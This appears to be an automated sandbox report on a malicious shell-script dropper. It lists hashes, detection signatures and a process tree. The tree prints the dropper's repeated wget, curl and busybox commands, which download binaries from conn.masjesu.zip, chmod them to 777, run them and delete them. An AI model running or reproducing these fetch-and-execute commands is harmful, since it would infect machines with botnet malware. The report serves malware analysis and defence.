Analysis
- max time kernel: 134s
- max time network: 136s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240729-en
- resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 24/11/2024, 01:00
Tasks
- Static task static1
- Behavioral task behavioral1: sample ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh, resource ubuntu1804-amd64-20240611-en
- Behavioral task behavioral2: sample ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh, resource debian9-armhf-20240611-en
- Behavioral task behavioral3: sample ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh, resource debian9-mipsbe-20240729-en
- Behavioral task behavioral4: sample ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh, resource debian9-mipsel-20240611-en
General
- Target: ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
- Size: 10KB
- MD5: 03977dc333adcf1bd239088130c5146a
- SHA1: 786dda0f9a258257c3c8c8c196b0c80525e5c921
- SHA256: ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613
- SHA512: 6ecac3ce1d920fd81213a199987a4a9a636a164c9bbf7c86cba42a80c7d290b356c0afcf43ffaab877a673204b166c43ca7a878f6ee263c34bdec145196d5066
- SSDEEP: 192:9C6r48xt6ApTzGrokonqyTCaxYxKC6r48oiTzGSkonqyr:/t6ApTzGrwCxiTzG0
Malware Config
Signatures
File and Directory Permissions Modification (1 TTP, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod in every entry. PIDs: 856, 996, 842, 975, 982, 877, 821, 863, 989, 750, 884, 905, 919, 926, 933, 940, 947, 743, 870, 954, 891, 898, 1003, 1010, 849, 961, 968, 912
Executes dropped EXE (28 IoCs)
ioc (PID); in every entry the process name is the basename of the ioc path:
- /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 (744)
- /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA (751)
- /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD (823)
- /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m (843)
- /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt (850)
- /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT (857)
- /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To (864)
- /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 (871)
- /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 (878)
- /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW (885)
- /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr (892)
- /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK (899)
- /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H (906)
- /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs (913)
- /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H (920)
- /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs (927)
- /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK (934)
- /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD (941)
- /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m (948)
- /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 (955)
- /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA (962)
- /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To (969)
- /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 (976)
- /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt (983)
- /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT (990)
- /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW (997)
- /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr (1004)
- /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 (1011)
Reads runtime system information
description / ioc / Process: File opened for reading /proc/sys/crypto/fips_enabled by curl (identical entry repeated for each curl invocation in the process tree)
System Network Configuration Discovery (1 TTP, 64 IoCs)
Adversaries may gather information about the network configuration of a system.
pid / Process: 742 busybox, 908 wget, 755 wget, 827 wget, 902 curl, 901 wget, 911 busybox, 944 curl, 946 busybox, 981 busybox, 988 busybox, 738 curl, 895 curl, 929 wget, 950 wget, 986 curl, 958 curl, 747 curl, 749 busybox, 762 curl, 848 busybox, 866 wget, 890 busybox, 922 wget, 964 wget, 979 curl, 838 busybox, 869 busybox, 918 busybox, 932 busybox, 951 curl, 960 busybox, 993 curl, 746 wget, 887 wget, 888 curl, 897 busybox, 936 wget, 965 curl, 846 curl, 971 wget, 845 wget, 904 busybox, 909 curl, 916 curl, 937 curl, 992 wget, 853 curl, 867 curl, 880 wget, 985 wget, 995 busybox, 881 curl, 957 wget, 974 busybox, 780 busybox, 852 wget, 855 busybox, 943 wget, 972 curl, 1002 busybox, 717 wget, 883 busybox, 894 wget
Writes file to tmp directory (28 IoCs)
Malware often drops required files in the /tmp directory.
description: File opened for modification; Process: curl in every entry; ioc, in report order:
- /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt
- /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT
- /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt
- /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT
- /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
- /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW
- /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK
- /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs
- /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675
- /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1
- /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA
- /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD
- /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H
- /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H
- /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs
- /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK
- /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675
- /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr
- /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
- /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To
- /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr
- /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To
- /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW
- /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m
- /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD
- /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m
- /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1
- /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA
Processes
Each entry reads: image (PID): command line [matched signatures]. Indentation gives the process depth.
- /tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh (PID 712): /tmp/ce2dcd84c71d76ef91c4e64669729eead724bbdf1d7cefd674347c51ab7db613.sh
  - /bin/rm (PID 715): /bin/rm bins.sh
  - /usr/bin/wget (PID 717): wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 738): curl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 742): /bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [System Network Configuration Discovery]
  - /bin/chmod (PID 743): chmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [File and Directory Permissions Modification]
  - /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 (PID 744): ./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [Executes dropped EXE]
  - /bin/rm (PID 745): rm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1
  - /usr/bin/wget (PID 746): wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [System Network Configuration Discovery]
  - /usr/bin/curl (PID 747): curl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 749): /bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [System Network Configuration Discovery]
  - /bin/chmod (PID 750): chmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [File and Directory Permissions Modification]
  - /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA (PID 751): ./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [Executes dropped EXE]
  - /bin/rm (PID 753): rm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA
  - /usr/bin/wget (PID 755): wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [System Network Configuration Discovery]
  - /usr/bin/curl (PID 762): curl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 780): /bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [System Network Configuration Discovery]
  - /bin/chmod (PID 821): chmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [File and Directory Permissions Modification]
  - /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD (PID 823): ./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [Executes dropped EXE]
  - /bin/rm (PID 826): rm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD
  - /usr/bin/wget (PID 827): wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [System Network Configuration Discovery]
  - /usr/bin/curl (PID 836): curl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 838): /bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [System Network Configuration Discovery]
  - /bin/chmod (PID 842): chmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [File and Directory Permissions Modification]
  - /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m (PID 843): ./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [Executes dropped EXE]
  - /bin/rm (PID 844): rm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m
  - /usr/bin/wget (PID 845): wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [System Network Configuration Discovery]
  - /usr/bin/curl (PID 846): curl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 848): /bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [System Network Configuration Discovery]
  - /bin/chmod (PID 849): chmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [File and Directory Permissions Modification]
  - /tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt (PID 850): ./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [Executes dropped EXE]
  - /bin/rm (PID 851): rm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt
  - /usr/bin/wget (PID 852): wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [System Network Configuration Discovery]
  - /usr/bin/curl (PID 853): curl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 855): /bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [System Network Configuration Discovery]
  - /bin/chmod (PID 856): chmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [File and Directory Permissions Modification]
  - /tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT (PID 857): ./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT [Executes dropped EXE]
  - /bin/rm (PID 858): rm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT
  - /usr/bin/wget (PID 859): wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To
  - /usr/bin/curl (PID 860): curl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 862): /bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To
  - /bin/chmod (PID 863): chmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To [File and Directory Permissions Modification]
  - /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To (PID 864): ./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To [Executes dropped EXE]
  - /bin/rm (PID 865): rm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To
  - /usr/bin/wget (PID 866): wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 867): curl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 869): /bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [System Network Configuration Discovery]
  - /bin/chmod (PID 870): chmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [File and Directory Permissions Modification]
  - /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 (PID 871): ./aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [Executes dropped EXE]
  - /bin/rm (PID 872): rm aihC944K8Q0TvCpjxSMtRX5smAOk3is675
  - /usr/bin/wget (PID 873): wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
  - /usr/bin/curl (PID 874): curl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 876): /bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
  - /bin/chmod (PID 877): chmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 [File and Directory Permissions Modification]
  - /tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 (PID 878): ./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0 [Executes dropped EXE]
  - /bin/rm (PID 879): rm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0
  - /usr/bin/wget (PID 880): wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [System Network Configuration Discovery]
  - /usr/bin/curl (PID 881): curl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 883): /bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [System Network Configuration Discovery]
  - /bin/chmod (PID 884): chmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [File and Directory Permissions Modification]
  - /tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW (PID 885): ./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW [Executes dropped EXE]
  - /bin/rm (PID 886): rm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW
  - /usr/bin/wget (PID 887): wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [System Network Configuration Discovery]
  - /usr/bin/curl (PID 888): curl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 890): /bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [System Network Configuration Discovery]
  - /bin/chmod (PID 891): chmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [File and Directory Permissions Modification]
  - /tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr (PID 892): ./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr [Executes dropped EXE]
  - /bin/rm (PID 893): rm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr
  - /usr/bin/wget (PID 894): wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [System Network Configuration Discovery]
  - /usr/bin/curl (PID 895): curl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 897): /bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [System Network Configuration Discovery]
  - /bin/chmod (PID 898): chmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [File and Directory Permissions Modification]
  - /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK (PID 899): ./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [Executes dropped EXE]
  - /bin/rm (PID 900): rm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK
  - /usr/bin/wget (PID 901): wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [System Network Configuration Discovery]
  - /usr/bin/curl (PID 902): curl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 904): /bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [System Network Configuration Discovery]
  - /bin/chmod (PID 905): chmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [File and Directory Permissions Modification]
  - /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H (PID 906): ./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [Executes dropped EXE]
  - /bin/rm (PID 907): rm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H
  - /usr/bin/wget (PID 908): wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [System Network Configuration Discovery]
  - /usr/bin/curl (PID 909): curl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 911): /bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [System Network Configuration Discovery]
  - /bin/chmod (PID 912): chmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [File and Directory Permissions Modification]
  - /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs (PID 913): ./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [Executes dropped EXE]
  - /bin/rm (PID 914): rm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs
  - /usr/bin/wget (PID 915): wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H
  - /usr/bin/curl (PID 916): curl -O http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 918): /bin/busybox wget http://conn.masjesu.zip/bins/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [System Network Configuration Discovery]
  - /bin/chmod (PID 919): chmod 777 f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [File and Directory Permissions Modification]
  - /tmp/f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H (PID 920): ./f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H [Executes dropped EXE]
  - /bin/rm (PID 921): rm f3Et0u8exkdljLE7ANvfSKjxyQkgiRq70H
  - /usr/bin/wget (PID 922): wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [System Network Configuration Discovery]
  - /usr/bin/curl (PID 923): curl -O http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 925): /bin/busybox wget http://conn.masjesu.zip/bins/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs
  - /bin/chmod (PID 926): chmod 777 M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [File and Directory Permissions Modification]
  - /tmp/M7iIC286PgDvtysfenfNbI0dcR21w98Bqs (PID 927): ./M7iIC286PgDvtysfenfNbI0dcR21w98Bqs [Executes dropped EXE]
  - /bin/rm (PID 928): rm M7iIC286PgDvtysfenfNbI0dcR21w98Bqs
  - /usr/bin/wget (PID 929): wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [System Network Configuration Discovery]
  - /usr/bin/curl (PID 930): curl -O http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 932): /bin/busybox wget http://conn.masjesu.zip/bins/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [System Network Configuration Discovery]
  - /bin/chmod (PID 933): chmod 777 KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [File and Directory Permissions Modification]
  - /tmp/KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK (PID 934): ./KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK [Executes dropped EXE]
  - /bin/rm (PID 935): rm KeMpNtq4r9kjZktH8bUcB5eTh25JuU25GK
  - /usr/bin/wget (PID 936): wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [System Network Configuration Discovery]
  - /usr/bin/curl (PID 937): curl -O http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 939): /bin/busybox wget http://conn.masjesu.zip/bins/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD
  - /bin/chmod (PID 940): chmod 777 eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [File and Directory Permissions Modification]
  - /tmp/eAUtElRrXgU3F4owPENkmI2x53Y08heRUD (PID 941): ./eAUtElRrXgU3F4owPENkmI2x53Y08heRUD [Executes dropped EXE]
  - /bin/rm (PID 942): rm eAUtElRrXgU3F4owPENkmI2x53Y08heRUD
  - /usr/bin/wget (PID 943): wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [System Network Configuration Discovery]
  - /usr/bin/curl (PID 944): curl -O http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 946): /bin/busybox wget http://conn.masjesu.zip/bins/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [System Network Configuration Discovery]
  - /bin/chmod (PID 947): chmod 777 YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [File and Directory Permissions Modification]
  - /tmp/YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m (PID 948): ./YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m [Executes dropped EXE]
  - /bin/rm (PID 949): rm YMLTMAnMNefei6FybzVloLS2yL0ndkQu6m
  - /usr/bin/wget (PID 950): wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 951): curl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 953): /bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1
  - /bin/chmod (PID 954): chmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [File and Directory Permissions Modification]
  - /tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 (PID 955): ./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1 [Executes dropped EXE]
  - /bin/rm (PID 956): rm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1
  - /usr/bin/wget (PID 957): wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [System Network Configuration Discovery]
  - /usr/bin/curl (PID 958): curl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 960): /bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [System Network Configuration Discovery]
  - /bin/chmod (PID 961): chmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [File and Directory Permissions Modification]
  - /tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA (PID 962): ./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA [Executes dropped EXE]
  - /bin/rm (PID 963): rm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA
  - /usr/bin/wget (PID 964): wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To [System Network Configuration Discovery]
  - /usr/bin/curl (PID 965): curl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 967): /bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To
  - /bin/chmod (PID 968): chmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To [File and Directory Permissions Modification]
  - /tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To (PID 969): ./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To [Executes dropped EXE]
  - /bin/rm (PID 970): rm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To
  - /usr/bin/wget (PID 971): wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 972): curl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 974): /bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [System Network Configuration Discovery]
  - /bin/chmod (PID 975): chmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [File and Directory Permissions Modification]
  - /tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675 (PID 976): ./aihC944K8Q0TvCpjxSMtRX5smAOk3is675 [Executes dropped EXE]
  - /bin/rm (PID 977): rm aihC944K8Q0TvCpjxSMtRX5smAOk3is675
  - /usr/bin/wget (PID 978): wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt
  - /usr/bin/curl (PID 979): curl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 981): /bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [System Network Configuration Discovery]
  - /bin/chmod (PID 982): chmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt [File and Directory Permissions Modification]
